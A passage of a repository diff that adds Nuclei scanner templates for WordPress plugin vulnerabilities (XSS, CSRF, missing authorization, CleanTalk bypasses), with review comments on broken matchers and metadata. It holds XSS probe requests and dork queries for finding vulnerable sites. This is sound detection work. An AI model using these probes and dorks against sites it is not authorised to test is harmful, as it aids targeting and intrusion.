Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + + - | + GET /wp-admin/admin.php?page=fv_player_stats&player_id=1 HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + - "

    FV Player Stats

    " + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/23 diff --git a/poc/cve/CVE-2022-0271-6617.yaml b/poc/cve/CVE-2022-0271-6617.yaml new file mode 100644 index 0000000000..44ceba55fb --- /dev/null +++ b/poc/cve/CVE-2022-0271-6617.yaml @@ -0,0 +1,37 @@ +id: CVE-2022-0271 + +info: + name: LearnPress < 4.1.6 - Reflected Cross-Site Scripting + author: Akincibor + severity: medium + description: The plugin does not sanitise and escape the lp-dismiss-notice before outputting it back via the lp_background_single_email AJAX action, leading to a Reflected Cross-Site Scripting + reference: + - https://wpscan.com/vulnerability/ad07d9cd-8a75-4f7c-bbbe-3b6b89b699f2 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0271 + tags: xss,wp,wp-plugin,wordpress,cve,cve2022,learnpress + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2022-0271 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-admin/admin-ajax.php?action=lp_background_single_email&lp-dismiss-notice=xxx' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '{"dismissed":"xxx"}' + + - type: word + words: + - "text/html" + part: header + + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2022-0288(1).yaml b/poc/cve/CVE-2022-0288(1).yaml new file mode 100644 index 0000000000..6fe7c560eb --- /dev/null +++ b/poc/cve/CVE-2022-0288(1).yaml 
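Review bot: The second body word is shown here as `FV Player Stats` wrapped in blank lines and indentation, and a `word` matcher compares bytes, so a multi-line value with surrounding whitespace will not match the page even when the heading is present; use a single-line fingerprint, `- "FV Player Stats"`. The first word renders as `""` and the `player_id=1` request carries no injected value, so the reflected `<script>` payload appears to be missing from both the request and the matcher; verify the repository file carries it, otherwise the template only proves the stats page loads.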
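Review bot: The request reflects `lp-dismiss-notice=xxx` and matches `{"dismissed":"xxx"}` under a `text/html` content type, which proves reflection in an HTML-typed response but not that the value is unescaped — a handler that runs the value through `esc_html()` would pass this test unchanged. Use a value carrying markup, e.g. `lp-dismiss-notice=%3Cimg%20src%3Dx%3E`, and match `{"dismissed":"<img src=x>"}` so a match implies the tag survives encoding. The `reference` points at mitre while the rest of the batch uses nvd.nist.gov; harmless, but inconsistent.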
@@ -0,0 +1,60 @@ +id: CVE-2022-0288 + +info: + name: WordPress Ad Inserter <2.7.10 - Cross-Site Scripting + author: DhiyaneshDK + severity: medium + description: | + WordPress Ad Inserter plugin before 2.7.10 contains a cross-site scripting vulnerability. It does not sanitize and escape the html_element_selection parameter before outputting it back in the page. + impact: | + Successful exploitation of this vulnerability could lead to cross-site scripting (XSS) attacks, allowing attackers to execute malicious scripts in the context of the victim's browser. + remediation: Fixed in version 2.7.12 + reference: + - https://wpscan.com/vulnerability/27b64412-33a4-462c-bc45-f81697e4fe42 + - https://nvd.nist.gov/vuln/detail/CVE-2022-0288 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-0288 + cwe-id: CWE-79 + epss-score: 0.00106 + epss-percentile: 0.42122 + cpe: cpe:2.3:a:ad_inserter_pro_project:ad_inserter_pro:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: ad_inserter_pro_project + product: ad_inserter_pro + framework: wordpress + tags: cve,cve2022,wordpress,xss,wpscan,ad_inserter_pro_project + +http: + - method: POST + path: + - "{{BaseURL}}" + + body: | + html_element_selection= + + headers: + Content-Type: "application/x-www-form-urlencoded" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + - "ad-inserter" + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 +# digest: 4a0a00473045022100a1ca7cd22a56a330f431df7aac1d8932a96f61707e94e4cec22162652d6e4fb3022073e6e623e1d660731778b65b288a3bf36e832dd59d8e3eb8377199e6f4915093:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
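Review bot: The POST body is `html_element_selection=` with no value and the first body word is `""`, so as rendered the template posts an empty parameter to the site root and fires on any 200 text/html page containing `ad-inserter` — every site with the plugin installed, vulnerable or not. The value and the word should both be the literal reflected payload; if they were stripped on rendering, confirm the committed file. The metadata is inconsistent as well: the name and description say `< 2.7.10` but `remediation` says `Fixed in version 2.7.12`; align them with the wpscan entry, and note the `# digest:` line means the correction must be re-signed.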
diff --git a/poc/cve/CVE-2023-2299-dc65b04d2202ad9c581e5d4523d9377b.yaml b/poc/cve/CVE-2023-2299-dc65b04d2202ad9c581e5d4523d9377b.yaml new file mode 100644 index 0000000000..029856609e --- /dev/null +++ b/poc/cve/CVE-2023-2299-dc65b04d2202ad9c581e5d4523d9377b.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2023-2299-dc65b04d2202ad9c581e5d4523d9377b + +info: + name: > + Online Booking & Scheduling Calendar for WordPress by vcita <= 4.4.2 - Missing Authorization on REST-API + author: topscoder + severity: high + description: > + The Online Booking & Scheduling Calendar for WordPress by vcita plugin for WordPress is vulnerable to unauthorized medication of data via the /wp-json/vcita-wordpress/v1/actions/auth REST-API endpoint in versions up to, and including, 4.4.2 due to a missing capability check on the processAction function. This makes it possible for unauthenticated attackers modify the plugin's settings. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/4855627a-de56-49ee-b0b0-01b9735d8557?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2023-2299 + metadata: + fofa-query: "wp-content/plugins/meeting-scheduler-by-vcita/" + google-query: inurl:"/wp-content/plugins/meeting-scheduler-by-vcita/" + shodan-query: 'vuln:CVE-2023-2299' + tags: cve,wordpress,wp-plugin,meeting-scheduler-by-vcita,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/meeting-scheduler-by-vcita/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "meeting-scheduler-by-vcita" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.4.2') \ No newline at end of file diff --git a/poc/cve/CVE-2023-2414-9f0d12c35523ff4f5d135545493c24b6.yaml b/poc/cve/CVE-2023-2414-9f0d12c35523ff4f5d135545493c24b6.yaml new file mode 100644 index 0000000000..63e3b01e3f 
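Review bot: `severity: high` disagrees with `cvss-score: 5.3` (CVSS 3.1 rates 5.3 as medium) and the trailing `,high` tag repeats the mismatch; the same severity/score disagreement appears in the hunks for CVE-2023-2414 (5.4 / low), CVE-2024-10113 (6.4 / low), CVE-2024-10308 (6.4 / low), CVE-2024-10542 (9.8 / high, which is critical), CVE-2024-10579 (4.3 / low), CVE-2024-10632 (4.4 / low), CVE-2024-10729 (8.8 / low), CVE-2024-10857 (6.5 / low), CVE-2024-10868 (4.3 / low) and CVE-2024-11002 (6.3 / low). Pick one source of truth, either the score or the vendor-assigned severity, and derive the other field and the tag from it, since triage tooling filters on `severity` and will otherwise mis-prioritise these findings. The `description` also reads `unauthorized medication of data` and `unauthenticated attackers modify`; it should be `unauthorized modification of data` and `unauthenticated attackers to modify`.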
--- /dev/null +++ b/poc/cve/CVE-2023-2414-9f0d12c35523ff4f5d135545493c24b6.yaml @@ -0,0 +1,59 @@ +id: CVE-2023-2414-9f0d12c35523ff4f5d135545493c24b6 + +info: + name: > + Online Booking & Scheduling Calendar for WordPress by vcita <= 4.4.6 - Missing Authorization to Settings Update and Arbitrary File Upload + author: topscoder + severity: low + description: > + The Online Booking & Scheduling Calendar for WordPress by vcita plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the vcita_save_settings_callback function in versions up to, and including, 4.4.6. This makes it possible for authenticated attackers with minimal permissions, such as a subscriber, to modify the plugins settings, upload arbitrary files, and inject malicious JavaScript (before 4.3.2). + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3c99aab5-a995-44ae-bc14-09f73e6b22c5?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L + cvss-score: 5.4 + cve-id: CVE-2023-2414 + metadata: + fofa-query: "wp-content/plugins/meeting-scheduler-by-vcita/" + google-query: inurl:"/wp-content/plugins/meeting-scheduler-by-vcita/" + shodan-query: 'vuln:CVE-2023-2414' + tags: cve,wordpress,wp-plugin,meeting-scheduler-by-vcita,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/meeting-scheduler-by-vcita/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "meeting-scheduler-by-vcita" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.4.6') \ No newline at end of file 
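Review bot: This template only infers the installed version from the `Stable tag` line of `readme.txt` and never exercises `vcita_save_settings_callback`, so a positive means "readme reports <= 4.4.6", not a verified missing capability check; a site that has removed `readme.txt` yields a false negative and a stale vendored readme a false positive. The same applies to every other `topscoder` template in this commit (the hunks for CVE-2023-2299 and CVE-2023-7297 through CVE-2024-11002), none of which touches the function or endpoint named in its `name`. A one-line comment above `matchers-condition`, e.g. `# detection is version-based (readme.txt Stable tag); not an exploitation check`, would set expectations for anyone triaging results. The two `regex` extractors are identical apart from `internal: true`; if the second exists only so the extracted version is reported in the output, say so with `# non-internal duplicate so the matched version appears in results`.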
diff --git a/poc/cve/CVE-2023-7297-a95d63f970ebd421a8709918222db375.yaml b/poc/cve/CVE-2023-7297-a95d63f970ebd421a8709918222db375.yaml new file mode 100644 index 0000000000..34870a3229 --- /dev/null +++ b/poc/cve/CVE-2023-7297-a95d63f970ebd421a8709918222db375.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2023-7297-a95d63f970ebd421a8709918222db375 + +info: + name: > + TwitterPosts <= 1.0.2 - Cross-Site Request Forgery to Plugin Settings Update + author: topscoder + severity: medium + description: > + The TwitterPosts plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.2. This is due to missing or incorrect nonce validation on one of its functions. This makes it possible for unauthenticated attackers to change the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/66f82859-1798-42ed-bb6a-44b0af438c7f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2023-7297 + metadata: + fofa-query: "wp-content/plugins/twitter-posts/" + google-query: inurl:"/wp-content/plugins/twitter-posts/" + shodan-query: 'vuln:CVE-2023-7297' + tags: cve,wordpress,wp-plugin,twitter-posts,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/twitter-posts/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "twitter-posts" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10113-5e3997da307eb6c6a9470bf105039eed.yaml b/poc/cve/CVE-2024-10113-5e3997da307eb6c6a9470bf105039eed.yaml new file mode 100644 index 0000000000..535f3d43ce --- /dev/null 
+++ b/poc/cve/CVE-2024-10113-5e3997da307eb6c6a9470bf105039eed.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10113-5e3997da307eb6c6a9470bf105039eed + +info: + name: > + WP AdCenter – Ad Manager & Adsense Ads <= 2.5.7 - Authenticated (Contributor+) Stored Cross-Site Scripting via wpadcenter_ad Shortcode + author: topscoder + severity: low + description: > + The WP AdCenter – Ad Manager & Adsense Ads plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wpadcenter_ad shortcode in all versions up to, and including, 2.5.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0597a63d-2627-477f-874a-c35b6df7afd5?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-10113 + metadata: + fofa-query: "wp-content/plugins/wpadcenter/" + google-query: inurl:"/wp-content/plugins/wpadcenter/" + shodan-query: 'vuln:CVE-2024-10113' + tags: cve,wordpress,wp-plugin,wpadcenter,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wpadcenter/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wpadcenter" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.5.7') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-10308-e95e71d9b22aad1a339e647728650987.yaml b/poc/cve/CVE-2024-10308-e95e71d9b22aad1a339e647728650987.yaml new file mode 100644 index 0000000000..bb462ad690 --- /dev/null +++ b/poc/cve/CVE-2024-10308-e95e71d9b22aad1a339e647728650987.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-10308-e95e71d9b22aad1a339e647728650987 + +info: + name: > + Jeg Elementor Kit <= 2.6.9 - Authenticated (Contributor+) Stored Cross-Site Scripting via JKit - Countdown Widget + author: topscoder + severity: low + description: > + The Jeg Elementor Kit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's JKit - Countdown widget in all versions up to, and including, 2.6.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/98aed079-672c-43bb-a5eb-faf8ffc04b71?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-10308 + metadata: + fofa-query: "wp-content/plugins/jeg-elementor-kit/" + google-query: inurl:"/wp-content/plugins/jeg-elementor-kit/" + shodan-query: 'vuln:CVE-2024-10308' + tags: cve,wordpress,wp-plugin,jeg-elementor-kit,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/jeg-elementor-kit/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "jeg-elementor-kit" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.6.9') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-10542-9cd3734bb0202544680880ac3ce86ba2.yaml b/poc/cve/CVE-2024-10542-9cd3734bb0202544680880ac3ce86ba2.yaml new file mode 100644 index 0000000000..4f834fdc41 --- /dev/null +++ b/poc/cve/CVE-2024-10542-9cd3734bb0202544680880ac3ce86ba2.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-10542-9cd3734bb0202544680880ac3ce86ba2 + +info: + name: > + Spam protection, Anti-Spam, FireWall by CleanTalk <= 6.43.2 - Authorization Bypass via Reverse DNS Spoofing to Unauthenticated Arbitrary Plugin Installation + author: topscoder + severity: high + description: > + The Spam protection, Anti-Spam, FireWall by CleanTalk plugin for WordPress is vulnerable to unauthorized Arbitrary Plugin Installation due to an authorization bypass via reverse DNS spoofing on the checkWithoutToken function in all versions up to, and including, 6.43.2. This makes it possible for unauthenticated attackers to install and activate arbitrary plugins which can be leveraged to achieve remote code execution if another vulnerable plugin is installed and activated. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d7eb5fad-bb62-4f0b-ad52-b16c3e442b62?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-10542 + metadata: + fofa-query: "wp-content/plugins/cleantalk-spam-protect/" + google-query: inurl:"/wp-content/plugins/cleantalk-spam-protect/" + shodan-query: 'vuln:CVE-2024-10542' + tags: cve,wordpress,wp-plugin,cleantalk-spam-protect,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/cleantalk-spam-protect/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "cleantalk-spam-protect" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.43.2') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-10570-d0ebaa66e0fdb4a7b5c05832ecd238b9.yaml b/poc/cve/CVE-2024-10570-d0ebaa66e0fdb4a7b5c05832ecd238b9.yaml new file mode 100644 index 0000000000..efba34e940 --- /dev/null +++ b/poc/cve/CVE-2024-10570-d0ebaa66e0fdb4a7b5c05832ecd238b9.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-10570-d0ebaa66e0fdb4a7b5c05832ecd238b9 + +info: + name: > + Security & Malware scan by CleanTalk <= 2.145 - Authorization Bypass via Reverse DNS Spoofing to Unauthenticated SQL Injection + author: topscoder + severity: high + description: > + The Security & Malware scan by CleanTalk plugin for WordPress is vulnerable to unauthorized SQL Injection due to an authorization bypass via reverse DNS spoofing on the checkWithoutToken function in all versions up to, and including, 2.145, as well as insufficient input sanitization and validation. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2187311d-6651-4eca-806d-aa2ff9fae4e2?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2024-10570 + metadata: + fofa-query: "wp-content/plugins/security-malware-firewall/" + google-query: inurl:"/wp-content/plugins/security-malware-firewall/" + shodan-query: 'vuln:CVE-2024-10570' + tags: cve,wordpress,wp-plugin,security-malware-firewall,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/security-malware-firewall/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "security-malware-firewall" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.145') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-10579-3b42e924fd20aca47fa65689d369e300.yaml b/poc/cve/CVE-2024-10579-3b42e924fd20aca47fa65689d369e300.yaml new file mode 100644 index 0000000000..3b26f607f7 --- /dev/null +++ b/poc/cve/CVE-2024-10579-3b42e924fd20aca47fa65689d369e300.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-10579-3b42e924fd20aca47fa65689d369e300 + +info: + name: > + Hustle – Email Marketing, Lead Generation, Optins, Popups <= 7.8.5 - Missing Authorization to Unpublished Form Exposure + author: topscoder + severity: low + description: > + The Hustle – Email Marketing, Lead Generation, Optins, Popups plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the preview_module() function in all versions up to, and including, 7.8.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to view unpublished forms. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ebd96d9c-c1ab-4a53-a52a-9fc2541482f2?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.3 + cve-id: CVE-2024-10579 + metadata: + fofa-query: "wp-content/plugins/wordpress-popup/" + google-query: inurl:"/wp-content/plugins/wordpress-popup/" + shodan-query: 'vuln:CVE-2024-10579' + tags: cve,wordpress,wp-plugin,wordpress-popup,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wordpress-popup/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wordpress-popup" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 7.8.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10632-ce98811461e8d024a9032e659d9f6dc9.yaml b/poc/cve/CVE-2024-10632-ce98811461e8d024a9032e659d9f6dc9.yaml new file mode 100644 index 0000000000..e5633602ab --- /dev/null 
+++ b/poc/cve/CVE-2024-10632-ce98811461e8d024a9032e659d9f6dc9.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10632-ce98811461e8d024a9032e659d9f6dc9 + +info: + name: > + Nokaut Offers Box <= 1.4.0 - Authenticated (Administrator+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Nokaut Offers Box plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.4.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e0dd2417-54b5-4838-88da-1893559bd255?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-10632 + metadata: + fofa-query: "wp-content/plugins/nokaut-offers-box/" + google-query: inurl:"/wp-content/plugins/nokaut-offers-box/" + shodan-query: 'vuln:CVE-2024-10632' + tags: cve,wordpress,wp-plugin,nokaut-offers-box,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/nokaut-offers-box/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "nokaut-offers-box" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.0') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-10634-1cfffc62bc3024e3b58ab7adce57d49d.yaml b/poc/cve/CVE-2024-10634-1cfffc62bc3024e3b58ab7adce57d49d.yaml new file mode 100644 index 0000000000..3b2484fd11 --- /dev/null +++ b/poc/cve/CVE-2024-10634-1cfffc62bc3024e3b58ab7adce57d49d.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-10634-1cfffc62bc3024e3b58ab7adce57d49d + +info: + name: > + Nokaut Offers Box <= 1.4.0 - Cross-Site Request Forgery to Plugin Setting Reset + author: topscoder + severity: medium + description: > + The Nokaut Offers Box plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.4.0. This is due to missing or incorrect nonce validation on one of its functions. This makes it possible for unauthenticated attackers to reset the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2f6d43ad-d1b9-4f66-ba08-d0ffc235f7c8?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-10634 + metadata: + fofa-query: "wp-content/plugins/nokaut-offers-box/" + google-query: inurl:"/wp-content/plugins/nokaut-offers-box/" + shodan-query: 'vuln:CVE-2024-10634' + tags: cve,wordpress,wp-plugin,nokaut-offers-box,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/nokaut-offers-box/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "nokaut-offers-box" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10677-17d70666036f25fcf74aa1320bac4cf3.yaml b/poc/cve/CVE-2024-10677-17d70666036f25fcf74aa1320bac4cf3.yaml new file mode 100644 index 0000000000..1d9ed48ebb --- /dev/null 
+++ b/poc/cve/CVE-2024-10677-17d70666036f25fcf74aa1320bac4cf3.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10677-17d70666036f25fcf74aa1320bac4cf3 + +info: + name: > + BTEV <= Cross-Site Request Forgery to Plugin Settings Update + author: topscoder + severity: medium + description: > + The BTEV plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.2. This is due to missing or incorrect nonce validation on one of its functions. This makes it possible for unauthenticated attackers to change the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/215be163-f362-4bda-b81a-65ec955968a2?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-10677 + metadata: + fofa-query: "wp-content/plugins/bluetrait-event-viewer/" + google-query: inurl:"/wp-content/plugins/bluetrait-event-viewer/" + shodan-query: 'vuln:CVE-2024-10677' + tags: cve,wordpress,wp-plugin,bluetrait-event-viewer,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/bluetrait-event-viewer/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "bluetrait-event-viewer" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.2') \ No newline at end of file 
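Review bot: `name` reads `BTEV <= Cross-Site Request Forgery to Plugin Settings Update`; the version bound is missing between `<=` and the title, although `description` and the `dsl` matcher both use 2.0.2. It should read `BTEV <= 2.0.2 - Cross-Site Request Forgery to Plugin Settings Update` so that reports keyed on `name` do not show a malformed title for this finding.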
diff --git a/poc/cve/CVE-2024-10729-176c3f5bae8556ce3b12e234c357e170.yaml b/poc/cve/CVE-2024-10729-176c3f5bae8556ce3b12e234c357e170.yaml new file mode 100644 index 0000000000..b1a40745b4 --- /dev/null +++ b/poc/cve/CVE-2024-10729-176c3f5bae8556ce3b12e234c357e170.yaml 
